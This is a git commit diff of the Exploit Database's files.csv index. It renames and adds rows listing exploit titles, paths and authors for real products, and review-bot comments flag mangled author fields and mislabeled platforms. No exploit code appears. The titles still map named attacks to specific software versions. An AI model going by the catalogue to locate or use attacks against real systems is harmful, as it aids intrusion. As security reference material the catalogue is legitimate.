DB: 2016-09-16

3 new exploits

Avaya IP Office Phone Manager - Local Password Disclosure

BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities

PA168 Chipset IP Phones - Weak Session Management Exploit

CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash

phpMyAdmin - '/scripts/setup.php' PHP Code Injection

NScan 0.9.1 - (Target) Buffer Overflow
NScan 0.9.1 - 'Target' Buffer Overflow

Xerox WorkCentre - Multiple Models Denial of Service
Xerox WorkCentre  (Multiple Models) - Denial of Service
Cisco EPC 3925 - Multiple Vulnerabilities

httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)

Novell eDirectory 8.8sp5 - Buffer Overflow

Uebimiau Webmail 3.2.0-2.0 - Email Disclosure

ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)

Integard Home and Pro 2 - Remote HTTP Buffer Overflow

Multiple D-Link Router Models - Authentication Bypass
D-Link Router (Multiple Models) - Authentication Bypass

iSO Air Files 2.6 - Directory Traversal
iOS FtpDisc 1.0 - Directory Traversal
iOS SideBooks 1.0 - Directory Traversal
iOS FtpDisc 1.0 - Directory Traversal
iOS SideBooks 1.0 - Directory Traversal
iSO Filer Lite 2.1.0 - Directory Traversal
iOS iDocManager 1.0.0 - Directory Traversal
iOS myDBLite 1.1.10 - Directory Traversal
iSO Filer Lite 2.1.0 - Directory Traversal
iOS iDocManager 1.0.0 - Directory Traversal
iOS myDBLite 1.1.10 - Directory Traversal

iOS Share 1.0 - Directory Traversal

iOS TIOD 1.3.3 - Directory Traversal

Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation
Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation

Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure

Apache/mod_ssl 2.0.x - Remote Denial of Service

SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation

Airlive IP Cameras - Multiple Vulnerabilities

Monkey CMS - Multiple Vulnerabilities

NetBSD mail.local - Privilege Escalation (Metasploit)

Apache Mina 2.0.13 - Remote Command Execution

Apache Mina 2.0.13 - Remote Command Execution

DeepOfix SMTP Server 3.3 - Authentication Bypass

xEpan 1.0.4 - Multiple Vulnerabilities
Humhub 0.10.0-rc.1 - SQL Injection
Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Humhub 0.10.0-rc.1 - SQL Injection
Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities

Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness
Koha 3.20.1 - Multiple SQL Injections
Koha 3.20.1 - Directory Traversal
Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities
Koha 3.20.1 - Multiple SQL Injections
Koha 3.20.1 - Directory Traversal
Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities

8 TOTOLINK Router Models - Backdoor and Remote Code Execution
8 TOTOLINK Router Models - Backdoor / Remote Code Execution

Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow

TestLink 1.9.14 - Cross-Site Request Forgery

PaKnPost Pro 1.14 - Multiple Vulnerabilities

zFTP Client 20061220 - (Connection Name) Local Buffer Overflow
zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow

NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access
NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access

Cisco ASA 8.x - Authentication Bypass (EXTRABACON)
Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass
Watchguard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)
Cisco ASA / PIX - Privilege Escalation (EPICBANANA)
TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)
TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)
TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL)
TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR)
Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)
Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation
Cisco ASA / PIX - 'EPICBANANA' Privilege Escalation
TOPSEC Firewalls - 'ELIGIBLECONTESTANT' Remote Code Execution
TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code Execution
TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution
TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit
Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution

tcPbX - (tcpbx_lang) Local File Inclusion
tcPbX - 'tcpbx_lang' Local File Inclusion
Offensive Security 2016-09-16 05:08:37 +00:00
parent f1e68e0b1d
commit 751e61a6bf
4 changed files with 1112 additions and 51 deletions

105
files.csv

@ -661,7 +661,7 @@ id,file,description,date,author,platform,type,port
836,platforms/windows/local/836.c,"WWW File Share Pro 2.72 - Local Password Disclosure",2005-02-23,Kozan,windows,local,0
837,platforms/windows/local/837.c,"Chat Anywhere 2.72a - Local Password Disclosure",2005-02-23,Kozan,windows,local,0
838,platforms/multiple/dos/838.pl,"webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service",2005-02-24,karak0rsan,multiple,dos,0
839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0
839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",windows,local,0
840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0
841,platforms/windows/dos/841.c,"Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0
842,platforms/linux/dos/842.c,"WU-FTPD 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,linux,dos,0
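
Review bot: On row 839 the author field goes from "Adrian ""pagvac"" Pastor" to "Adrian _pagvac_ Pastor", which changes the credited name rather than the encoding. Doubling the quote inside a quoted field is the standard CSV escape (RFC 4180), so the old value was already well-formed; if a consumer of files.csv mis-parses it, fixing that consumer keeps the nickname intact. If the rewrite has to stay, document the substitution rule alongside the file, because nothing in the row marks which underscores stand in for quotes.
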
@ -1743,7 +1743,7 @@ id,file,description,date,author,platform,type,port
2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps,0
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",hardware,remote,0
2035,platforms/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Arbitrary File Upload",2006-07-18,rgod,php,webapps,0
2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0
2037,platforms/windows/dos/2037.c,"Dumb 0.9.3 - (it_read_envelope) Remote Heap Overflow (PoC)",2006-07-19,"Luigi Auriemma",windows,dos,0
@ -2862,7 +2862,7 @@ id,file,description,date,author,platform,type,port
3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - (config.php sql_language) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b - (user.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0
3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - (news_detail.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0
3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management Exploit",2007-01-24,"Adrian ""pagvac"" Pastor",hardware,remote,0
3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management Exploit",2007-01-24,"Adrian _pagvac_ Pastor",hardware,remote,0
3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0
3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
3192,platforms/php/webapps/3192.pl,"Xero Portal - 'phpbb_root_path' Remote File Inclusion",2007-01-24,"Mehmet Ince",php,webapps,0
@ -6709,7 +6709,7 @@ id,file,description,date,author,platform,type,port
7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0
7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0
7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian _pagvac_ Pastor",linux,dos,0
7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution",2008-11-18,XenoMuta,linux,remote,0
7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0
7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
@ -8416,7 +8416,7 @@ id,file,description,date,author,platform,type,port
8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links - 'report.php id' SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0
8919,platforms/php/webapps/8919.txt,"Joomla! Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0
8920,platforms/php/webapps/8920.txt,"Joomla! Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0
8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0
8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian _pagvac_ Pastor",php,webapps,0
8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0
8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure",2009-06-10,StAkeR,php,webapps,0
8924,platforms/php/webapps/8924.txt,"School Data Navigator - (page) Local / Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0
@ -8721,7 +8721,7 @@ id,file,description,date,author,platform,type,port
9242,platforms/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0
9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0
9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
40297,platforms/windows/local/40297.py,"NScan 0.9.1 - (Target) Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0
40297,platforms/windows/local/40297.py,"NScan 0.9.1 - 'Target' Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0
9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0
9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0
@ -8981,7 +8981,8 @@ id,file,description,date,author,platform,type,port
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - 'id' SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0
9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps,0
9513,platforms/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)",2009-08-25,"Jon Oberheide",linux,local,0
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre - Multiple Models Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre (Multiple Models) - Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0
40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80
9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - (ALLO) Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0
9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0
9517,platforms/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0
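
Review bot: The added row 40383 files "Cisco EPC 3925 - Multiple Vulnerabilities" under platform asp (platforms/asp/webapps/40383.txt), while the Xerox WorkCentre row 9514 directly above it is filed under hardware. If the EPC 3925 entry targets the device itself rather than a standalone ASP application, hardware/webapps is the consistent choice; confirm the platform in this change, since moving the file later changes the path that consumers of files.csv resolve.
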
@ -9270,7 +9271,7 @@ id,file,description,date,author,platform,type,port
9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0
9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)",2009-10-21,Dr_IDE,windows,local,0
9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b - source Disclosure",2009-10-21,Dr_IDE,windows,webapps,0
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",windows,remote,0
9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - Cross-Site Scripting / Information Disclosure / Injection",2009-10-26,"Antonion Parata",jsp,webapps,0
9888,platforms/php/webapps/9888.txt,"Joomla! Component Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0
9889,platforms/php/webapps/9889.txt,"Joomla! Component Book Library 1.0 - File Inclusion",2009-10-19,kaMtiEz,php,webapps,0
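
Review bot: Row 9886 turns the two-author field "Pankaj Kohli, Trancer" into "Pankaj Kohli_ Trancer", and the underscore is ambiguous as a separator: the context rows 9884 and 9885 in this same hunk credit Dr_IDE, where the underscore is part of the handle. A comma inside a quoted field is valid CSV, so the old row already parsed as one field. If a different separator is wanted for multiple authors, pick one that cannot be mistaken for part of a handle and apply it uniformly.
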
@ -9285,7 +9286,7 @@ id,file,description,date,author,platform,type,port
9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0
9901,platforms/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80
9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan, murderkey",windows,remote,80
9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",windows,remote,80
9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0
9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0
9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521
@ -10670,7 +10671,7 @@ id,file,description,date,author,platform,type,port
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re_ R4vax",php,webapps,0
11667,platforms/php/webapps/11667.txt,"Joomla! Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,php,webapps,0
11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0
@ -11436,7 +11437,7 @@ id,file,description,date,author,platform,type,port
12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) - SQL Injection",2010-05-07,Ra3cH,asp,webapps,0
12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0
12528,platforms/windows/local/12528.pl,"AVCON H323Call - Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0
12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0
12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script - 'offers.php' SQL Injection",2010-05-08,v3n0m,php,webapps,0
@ -13048,7 +13049,7 @@ id,file,description,date,author,platform,type,port
14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0
14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0
14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control - Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0
14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln, Nullthreat, rick2600",win_x86,remote,80
14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",win_x86,remote,80
14944,platforms/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' File Stack based Overflow",2010-09-08,Abysssec,windows,local,0
14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0
@ -13606,7 +13607,7 @@ id,file,description,date,author,platform,type,port
15663,platforms/windows/local/15663.py,"Mediacoder 0.7.5.4797 - '.m3u' Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0
15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0
15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0
15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0
15666,platforms/hardware/webapps/15666.txt,"D-Link Router (Multiple Models) - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0
15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0
15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - (mp3) Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0
15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0
@ -14019,7 +14020,7 @@ id,file,description,date,author,platform,type,port
16192,platforms/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos,0
16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption (PoC)",2011-02-28,LiquidWorm,windows,dos,0
16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS - SQL Injection",2011-02-24,p0pc0rn,cfm,webapps,0
16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0
16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Persistent Cross-Site Scripting",2011-02-19,"Saif El-Sherei",php,webapps,0
16197,platforms/php/webapps/16197.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,php,webapps,0
16198,platforms/php/webapps/16198.txt,"Independent Escort CMS - Blind SQL Injection",2011-02-19,NoNameMT,php,webapps,0
@ -14033,8 +14034,8 @@ id,file,description,date,author,platform,type,port
16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion",2011-02-22,lemlajt,php,webapps,0
16207,platforms/php/webapps/16207.txt,"dotProject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0
16216,platforms/linux/dos/16216.txt,"Red Hat Linux - stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0
16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0
16223,platforms/php/webapps/16223.txt,"VidiScript - SQL Injection",2011-02-23,ThEtA.Nu,php,webapps,0
16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary File Upload",2011-02-23,"AutoSec Tools",php,webapps,0
@ -14042,11 +14043,11 @@ id,file,description,date,author,platform,type,port
16213,platforms/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16214,platforms/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",windows,dos,0
16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16232,platforms/php/webapps/16232.txt,"WordPress Plugin GigPress 2.1.10 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0
16233,platforms/php/webapps/16233.txt,"WordPress Plugin Relevanssi 2.7.2 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0
16234,platforms/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0
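
Review bot: Row 16227 is edited here for its author field but keeps the title "iSO Filer Lite 2.1.0" and the hardware platform, while rows 16228, 16229 and 16231 in the same hunk, with the same authors and date, are titled "iOS ..." and filed under ios. "iSO" looks like a transposition of "iOS"; since the row is already being touched, correct the title in this change and decide whether the entry belongs under platforms/ios/remote with its siblings. Row 16226 ("iSO Air Files 2.6") in an earlier hunk shows the same pattern.
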
@ -14081,7 +14082,7 @@ id,file,description,date,author,platform,type,port
16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0
16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0
16273,platforms/php/webapps/16273.php,"WordPress Plugin PHP Speedy 0.5.2 - (admin_container.php) Remote Code Execution",2011-03-04,mr_me,php,webapps,0
16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit",2011-03-04,"Todor Donev",hardware,remote,0
@ -18954,7 +18955,7 @@ id,file,description,date,author,platform,type,port
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
